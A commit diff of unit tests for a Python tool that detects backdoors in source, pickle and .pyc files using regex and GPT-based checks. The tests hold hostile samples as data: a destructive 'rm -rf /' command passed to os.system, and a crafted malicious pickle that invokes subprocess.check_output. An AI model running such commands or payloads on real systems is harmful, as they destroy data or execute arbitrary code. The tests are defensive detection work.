self.assertEqual(len(classified_results["high"]), 0)
self.assertEqual(len(classified_results["medium"]), 0)
self.assertEqual(len(classified_results["low"]), 0)
if __name__ == "__main__":
unittest.main()

View File

@@ -1,7 +1,7 @@
import unittest
import warnings
from detection.backdoor_detection import find_dangerous_functions
from detection.__main__ import find_dangerous_functions
from detection.GPTdetection import detectGPT
import os
@@ -90,6 +90,23 @@ class TestBackdoorDetection(unittest.TestCase):
with self.assertRaises(ValueError):
detectGPT(content)
def test_find_dangerous_functions_pyc(self):
file_content = """import os
os.system('rm -rf /')
"""
file_extension = ".pyc"
expected_result = {
"high": [(2, "os.system('rm -rf /')")],
"medium": [],
"low": [],
"none": [],
}
result = find_dangerous_functions(file_content, file_extension)
self.assertEqual(result, expected_result)
if __name__ == "__main__":
unittest.main()

168
tests/test_final_tests.py Normal file
View File

@@ -0,0 +1,168 @@
import time
import unittest
import shutil
import os
import threading
import re
from detection.utils import read_file_content
from .final_tests_util import (
clone_repo,
Path,
inject_pickle_backdoor,
inject_random_backdoor,
inject_pyc_backdoor,
backdoors,
)
from detection.Regexdetection import find_dangerous_functions
from detection.GPTdetection import detectGPT
def GPTdetectFileList(fileList):
results = []
threads = []
for file in fileList:
content = read_file_content(str(file))
threads.append(threading.Thread(target=GPTThread(), args=(content, results)))
for thread in threads:
thread.start()
time.sleep(0.5)
for thread in threads:
thread.join()
return results
def GPTThread(content, results):
try:
results.append(detectGPT(content))
except Exception as e:
print(e)
class TestFinalTests(unittest.TestCase):
def setUp(self) -> None:
self.path = "./tmp/repo/"
shutil.rmtree(self.path, ignore_errors=True)
if not os.path.exists("/tmp/Python/"):
clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python")
shutil.copytree("/tmp/Python", self.path)
sampleRate = 0.1
# TODO
# preproccessing
self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate)
self.pickle_true_num = inject_pickle_backdoor(self.path)
self.pyc_true_num = inject_pyc_backdoor(self.path)
self.injectedNum = len(self.inject_result)
print(self.injectedNum)
project_path = Path(self.path)
self.all_python_files = list(project_path.rglob("*.py"))
self.py_files_num = len(self.all_python_files)
all_pickle_files = list(project_path.rglob("*.pickle"))
self.pickle_files_num = len(all_pickle_files)
all_pyc_files = list(project_path.rglob("*.pyc"))
self.pyc_files_num = len(all_pyc_files)
os.system(
"python -m detection " + self.path + " -o " + self.path + "output.txt"
)
def test_final_tests_pycode(self):
# test backdoor code in python files
detectedNum = 0
possibly_dangerous_file = []
for file in self.all_python_files:
content = read_file_content(str(file))
results = find_dangerous_functions(content, ".py")
if (
len(results["high"]) > 0
or len(results["medium"]) > 0
or len(results["low"]) > 0
):
detectedNum += 1
possibly_dangerous_file.append(file)
print(detectedNum / self.py_files_num)
GPTdetectedNum = 0
for i in possibly_dangerous_file:
content = read_file_content(str(i))
results = {}
try:
results = detectGPT(content)
if (
len(results["high"]) > 0
or len(results["medium"]) > 0
or len(results["low"]) > 0
):
GPTdetectedNum += 1
print(GPTdetectedNum)
except Exception as e:
# print(e)
pass
# test injected code
with open(self.path + "output.txt", "r") as f:
lines = f.readlines()
injected_detected_num = 0
injected_correct_num = 0
pattern = r"\w+\.py: Line \d+: (.+)"
for line in lines:
if "py:" in line:
injected_detected_num += 1
match = re.search(pattern, line)
command = ""
if match:
command = match.group(1)
for backdoor in backdoors:
if command in backdoor:
injected_correct_num += 1
break
injected_accurency = injected_detected_num / self.py_files_num
print(f"injected files accurency: {injected_accurency}")
try:
GPTresult = GPTdetectFileList(possibly_dangerous_file)
for result in GPTresult:
if len(result) > 0:
GPTdetectedNum += 1
print(GPTdetectedNum)
self.assertGreaterEqual(GPTdetectedNum, detectedNum)
except Exception as e:
# print(e)
pass
# test pickle files
with open(self.path + "output.txt", "r") as f:
lines = f.readlines()
pickle_detected_num = 0
pickle_correct_num = 0
for line in lines:
if "pickle" in line:
pickle_detected_num += 1
if re.search(r"backdoor\d*\.pickle", line):
pickle_correct_num += 1
pickle_accurency = pickle_detected_num / self.pickle_true_num
print(f"pickle files accurency: {pickle_accurency}")
# test pyc files
with open(self.path + "output.txt", "r") as f:
lines = f.readlines()
pyc_detected_num = 0
pyc_correct_num = 0
for line in lines:
if "pyc" in line:
pyc_detected_num += 1
if re.search(r"backdoor\d*\.pyc", line):
pyc_correct_num += 1
pyc_accurency = pyc_detected_num / self.pyc_true_num
print(f"pyc files accurency: {pyc_accurency}")
if __name__ == "__main__":
unittest.main()

View File

@@ -0,0 +1,56 @@
import unittest
import pickle
import tempfile
from detection.pickle_detection import pickleScanner, pickleDataDetection
from unittest.mock import patch
class TestPickleScanner(unittest.TestCase):
def setUp(self):
# Create temporary files with valid and malicious data
self.valid_data = {"key": "value"}
self.malicious_data = b"\x80\x03csubprocess\ncheck_output\nq\x00X\x05\x00\x00\x00echo 1q\x01\x85q\x02Rq\x03."
self.valid_file = tempfile.NamedTemporaryFile(delete=False)
self.valid_file.write(pickle.dumps(self.valid_data))
self.valid_file.close()
self.malicious_file = tempfile.NamedTemporaryFile(delete=False)
self.malicious_file.write(self.malicious_data)
self.malicious_file.close()
def tearDown(self):
# Clean up temporary files
import os
os.remove(self.valid_file.name)
os.remove(self.malicious_file.name)
def test_valid_pickle(self):
with open(self.valid_file.name, "rb") as file:
scanner = pickleScanner(file)
print(scanner.maliciousModule)
scanner.load()
output = scanner.output()
self.assertEqual(output["ReduceCount"], 0)
self.assertEqual(output["maliciousModule"], [])
def test_malicious_pickle(self):
with open(self.malicious_file.name, "rb") as file:
scanner = pickleScanner(file)
scanner.load()
output = scanner.output()
self.assertEqual(output["ReduceCount"], 1)
self.assertIn(("subprocess", "check_output"), output["maliciousModule"])
@patch("builtins.print")
def test_pickleDataDetection_no_output_file(self, mock_print):
# test output to stdout if filename is not given
with patch("builtins.print") as mock_print:
pickleDataDetection(self.valid_file.name)
mock_print.assert_called_once()
if __name__ == "__main__":
unittest.main()